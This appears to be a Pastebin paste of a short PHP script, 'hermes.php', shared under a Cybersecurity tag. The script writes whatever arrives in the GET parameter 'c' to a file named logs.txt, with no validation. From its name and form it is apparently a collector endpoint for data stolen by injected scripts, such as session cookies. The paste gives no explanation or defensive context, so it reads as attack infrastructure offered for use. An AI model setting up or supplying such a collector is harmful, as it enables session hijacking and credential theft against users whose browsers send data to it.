Advertisement
FlyFar

hermes.php

Nov 19th, 2023
696
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.16 KB | Cybersecurity | 0 0
  1. <?php
  2.     if(!empty($_GET['c']))
  3.     {
  4.         $logfile = fopen('logs.txt', 'a');
  5.         if($logfile != null)
  6.                 fwrite($logfile, $_GET['c']);
  7.         fclose($logfile);
  8.     }
  9. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement